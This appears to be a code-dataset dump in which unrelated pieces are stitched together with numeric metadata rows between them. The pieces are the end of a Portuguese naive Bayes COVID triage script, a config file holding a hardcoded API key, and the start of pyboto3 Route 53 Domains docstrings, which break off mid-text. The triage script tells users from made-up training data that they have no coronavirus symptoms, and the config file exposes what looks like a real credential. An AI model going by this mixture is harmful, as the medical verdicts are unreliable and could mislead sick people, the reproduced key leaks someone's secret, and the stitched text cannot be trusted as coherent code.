[1, 1, 0, 0, 0, 0, 1, 0, 0, 1],
[0, 0, 1, 0, 1, 0, 1, 0, 1, 0],
[1, 0, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 0, 1, 1, 0, 1, 1, 0, 1, 1],
[0, 1, 1, 0, 1, 0, 1, 0, 0, 1],
[1, 1, 1, 0, 1, 0, 1, 0, 1, 0],
[1, 0, 1, 0, 1, 0, 1, 0, 1, 0],
[1, 1, 0, 0, 1, 0, 0, 0, 0, 1],
[1, 1, 0, 0, 1, 0, 0, 0, 0, 1],
[1, 1, 1, 0, 1, 0, 1, 0, 1, 0],
[1, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0, 1, 0, 0, 1],
[1, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[1, 0, 1, 0, 0, 0, 1, 0, 1, 0],
[1, 1, 1, 0, 1, 0, 0, 0, 0, 0],
[1, 0, 1, 0, 0, 0, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 0, 0, 0, 1, 0],
[0, 1, 1, 1, 0, 0, 1, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 1, 1],
[0, 0, 1, 0, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[1, 0, 1, 0, 0, 0, 1, 0, 1, 1],
[1, 1, 1, 0, 0, 0, 1, 0, 1, 1],
[1, 1, 1, 0, 0, 0, 1, 0, 1, 1],
[0, 0, 1, 0, 1, 0, 0, 0, 1, 1],
[0, 1, 0, 0, 0, 0, 1, 1, 1, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 1, 0, 1, 0, 1, 0, 1, 1],
[1, 1, 0, 1, 1, 0, 0, 0, 1, 0],
[1, 1, 1, 0, 1, 0, 0, 0, 0, 1],
[1, 0, 1, 0, 1, 1, 1, 0, 0, 1],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 1],
[0, 1, 1, 0, 0, 0, 1, 0, 1, 1],
[1, 0, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 0, 0, 0, 1],
[0, 1, 0, 1, 0, 0, 0, 0, 1, 1],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 1, 1, 1],
[0, 1, 1, 0, 1, 0, 1, 0, 1, 1],
[0, 0, 1, 0, 0, 0, 1, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 1, 0, 1, 1, 1, 0, 0, 0],
[1, 0, 1, 0, 0, 0, 1, 0, 0, 1],
[1, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 1, 0, 1, 1, 0, 0, 0, 1],
[0, 1, 0, 0, 0, 1, 1, 0, 0, 0],
[1, 0, 0, 0, 1, 0, 1, 0, 1, 0],
[1, 1, 0, 0, 1, 0, 0, 1, 1, 0],
[1, 0, 1, 0, 0, 0, 1, 0, 1, 0],
[0, 0, 1, 0, 0, 0, 1, 0, 1, 1],
[1, 0, 1, 0, 1, 0, 1, 0, 0, 0],
[1, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 1, 0, 1, 0, 0, 0, 1, 0],
[1, 1, 1, 0, 1, 1, 0, 0, 1, 1],
[1, 0, 1, 1, 0, 0, 1, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 1, 1, 1, 1],
[1, 0, 1, 0, 0, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 0, 0, 1, 0, 1, 0],
[1, 1, 1, 0, 1, 1, 1, 0, 0, 0],
[1, 0, 1, 0, 0, 0, 1, 0, 0, 0],
[1, 1, 0, 0, 1, 0, 0, 0, 0, 1],
[1, 1, 0, 0, 1, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 1, 1],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 1, 1, 0, 0, 0, 1, 0, 1, 0],
[1, 0, 0, 1, 0, 0, 1, 0, 1, 1],
[1, 0, 1, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 0, 0, 1, 0, 1, 0],
[0, 1, 1, 0, 1, 0, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 0, 0, 0, 0, 1, 1, 0, 1, 1],
[1, 1, 0, 0, 1, 0, 1, 0, 0, 1],
[1, 0, 1, 0, 1, 0, 1, 0, 0, 0],
[1, 1, 0, 0, 1, 0, 1, 0, 0, 1],
[0, 0, 0, 0, 1, 0, 1, 1, 1, 1],
[1, 0, 0, 1, 0, 0, 0, 0, 0, 1],
[1, 1, 1, 0, 1, 0, 0, 0, 1, 1],
[0, 0, 1, 0, 0, 0, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 1, 0, 0, 0, 1, 0, 1, 0],
[1, 0, 0, 0, 1, 0, 1, 1, 0, 1],
[1, 1, 0, 0, 1, 0, 1, 0, 1, 0],
[1, 1, 1, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[1, 0, 0, 1, 1, 0, 1, 0, 1, 0],
[0, 0, 1, 0, 1, 0, 1, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 1, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 1, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 1, 1, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 0, 1, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 1, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 1, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 1, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 1, 1, 0, 0, 0, 1, 0, 0, 1],
[1, 0, 0, 1, 1, 0, 1, 0, 1, 0],
[0, 0, 1, 0, 1, 0, 1, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 1, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 1, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 1, 1, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 0, 1, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 1, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 1, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 1, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 1, 1, 0, 0, 0, 1, 0, 0, 1]
]
resultados = [
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
]
# Training the model
modelo = GaussianNB()
modelo.fit(atributos, resultados)
# Saving the model
pickle.dump(modelo, open('arquivo.sav', 'wb'))
# Loading the saved model
modelo = pickle.load(open('arquivo.sav', 'rb'))
# Predict
print("------------------------- TRIAGEM CORONA VÍRUS -------------------------\n")
print("Responda as perguntas com 0 para NÃO e 1 para SIM.")
febre = int(input("Apresenta febre? "))
cansaco = int(input("Apresenta cansaço? "))
tosse_seca = int(input("Apresenta tosse seca? "))
espirro = int(input("Apresenta espirro? "))
dores_corpo = int(input("Apresenta dores no corpo? "))
corizando = int(input("Está corizando? "))
dor_garganta = int(input("Apresenta dor de garganta? "))
diarreia = int(input("Apresenta diarreia? "))
dor_cabeca = int(input("Apresenta dor de cabeça? "))
falta_ar = int(input("Apresenta falta de ar? "))
novos_dados = [
[febre, cansaco, tosse_seca, espirro, dores_corpo,
corizando, dor_garganta, diarreia, dor_cabeca, falta_ar]
]
resposta = modelo.predict(novos_dados)
print("\nResultado:")
if resposta == 1:
print("Recomenda-se fazer o teste de corona vírus.")
else:
print("Paciente não apresenta sintomas de corona vírus.")
| 21.995378
| 114
| 0.299194
| 3,475
| 14,275
| 1.225324
| 0.021295
| 0.847816
| 0.987083
| 1.035228
| 0.782762
| 0.772428
| 0.772428
| 0.772194
| 0.772194
| 0.771959
| 0
| 0.392465
| 0.412399
| 14,275
| 648
| 115
| 22.029321
| 0.115165
| 0.0131
| 0
| 0.857143
| 0
| 0
| 0.033165
| 0.003693
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003175
| 0
| 0.003175
| 0.007937
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
bdc745b6c27dd73c8503ee4e2ec0ccb77b2ed5d0
| 45
|
py
|
Python
|
server/d2_config.py
|
lclbm/xrx_pvp_server
|
f40cdbdc5de8c04b8113611c3174c84a200402b1
|
[
"MIT"
] | 1
|
2022-03-31T06:27:03.000Z
|
2022-03-31T06:27:03.000Z
|
server/d2_config.py
|
lclbm/xrx_pvp_server
|
f40cdbdc5de8c04b8113611c3174c84a200402b1
|
[
"MIT"
] | null | null | null |
server/d2_config.py
|
lclbm/xrx_pvp_server
|
f40cdbdc5de8c04b8113611c3174c84a200402b1
|
[
"MIT"
] | 1
|
2022-03-10T07:39:24.000Z
|
2022-03-10T07:39:24.000Z
|
API_KEY = 'a8d09bbcc8e7477ab03e21716d047087'
| 22.5
| 44
| 0.866667
| 3
| 45
| 12.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0.066667
| 45
| 1
| 45
| 45
| 0.404762
| 0
| 0
| 0
| 0
| 0
| 0.711111
| 0.711111
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
da92a05087ed37e513fcf68ea9e46c68a3e7d53a
| 251,002
|
py
|
Python
|
pyboto3/route53domains.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 91
|
2016-12-31T11:38:37.000Z
|
2021-09-16T19:33:23.000Z
|
pyboto3/route53domains.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 7
|
2017-01-02T18:54:23.000Z
|
2020-08-11T13:54:02.000Z
|
pyboto3/route53domains.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 26
|
2016-12-31T13:11:00.000Z
|
2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def accept_domain_transfer_from_another_aws_account(DomainName=None, Password=None):
"""
Accepts the transfer of a domain from another AWS account to the current AWS account. You initiate a transfer between AWS accounts using TransferDomainToAnotherAwsAccount .
Use either ListOperations or GetOperationDetail to determine whether the operation succeeded. GetOperationDetail provides additional information, for example, Domain Transfer from Aws Account 111122223333 has been cancelled .
See also: AWS API Documentation
Exceptions
:example: response = client.accept_domain_transfer_from_another_aws_account(
DomainName='string',
Password='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that was specified when another AWS account submitted a TransferDomainToAnotherAwsAccount request.\n
:type Password: string
:param Password: [REQUIRED]\nThe password that was returned by the TransferDomainToAnotherAwsAccount request.\n
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
The AcceptDomainTransferFromAnotherAwsAccount response includes the following element.
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.DomainLimitExceeded
:return: {
'OperationId': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.DomainLimitExceeded
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def cancel_domain_transfer_to_another_aws_account(DomainName=None):
"""
Cancels the transfer of a domain from the current AWS account to another AWS account. You initiate a transfer between AWS accounts using TransferDomainToAnotherAwsAccount .
Use either ListOperations or GetOperationDetail to determine whether the operation succeeded. GetOperationDetail provides additional information, for example, Domain Transfer from Aws Account 111122223333 has been cancelled .
See also: AWS API Documentation
Exceptions
:example: response = client.cancel_domain_transfer_to_another_aws_account(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain for which you want to cancel the transfer to another AWS account.\n
:rtype: dict
ReturnsResponse Syntax{
'OperationId': 'string'
}
Response Structure
(dict) --The CancelDomainTransferToAnotherAwsAccount response includes the following element.
OperationId (string) --The identifier that TransferDomainToAnotherAwsAccount returned to track the progress of the request. Because the transfer request was canceled, the value is no longer valid, and you can\'t use GetOperationDetail to query the operation status.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
:return: {
'OperationId': 'string'
}
"""
pass
def check_domain_availability(DomainName=None, IdnLangCode=None):
"""
This operation checks the availability of one domain name. Note that if the availability status of a domain is pending, you must submit another request to determine the availability of the domain name.
See also: AWS API Documentation
Exceptions
:example: response = client.check_domain_availability(
DomainName='string',
IdnLangCode='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to get availability for. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nThe domain name can contain only the following characters:\n\nLetters a through z. Domain names are not case sensitive.\nNumbers 0 through 9.\nHyphen (-). You can\'t specify a hyphen at the beginning or end of a label.\nPeriod (.) to separate the labels in the name, such as the . in example.com .\n\nInternationalized domain names are not supported for some top-level domains. To determine whether the TLD that you want to use supports internationalized domain names, see Domains that You Can Register with Amazon Route 53 . For more information, see Formatting Internationalized Domain Names .\n
:type IdnLangCode: string
:param IdnLangCode: Reserved for future use.
:rtype: dict
Returns
Response Syntax
{
'Availability': 'AVAILABLE'|'AVAILABLE_RESERVED'|'AVAILABLE_PREORDER'|'UNAVAILABLE'|'UNAVAILABLE_PREMIUM'|'UNAVAILABLE_RESTRICTED'|'RESERVED'|'DONT_KNOW'
}
Response Structure
(dict) --
The CheckDomainAvailability response includes the following elements.
Availability (string) --
Whether the domain name is available for registering.
Note
You can register only domains designated as AVAILABLE .
Valid values:
AVAILABLE
The domain name is available.
AVAILABLE_RESERVED
The domain name is reserved under specific conditions.
AVAILABLE_PREORDER
The domain name is available and can be preordered.
DONT_KNOW
The TLD registry didn\'t reply with a definitive answer about whether the domain name is available. Route 53 can return this response for a variety of reasons, for example, the registry is performing maintenance. Try again later.
PENDING
The TLD registry didn\'t return a response in the expected amount of time. When the response is delayed, it usually takes just a few extra seconds. You can resubmit the request immediately.
RESERVED
The domain name has been reserved for another person or organization.
UNAVAILABLE
The domain name is not available.
UNAVAILABLE_PREMIUM
The domain name is not available.
UNAVAILABLE_RESTRICTED
The domain name is forbidden.
Exceptions
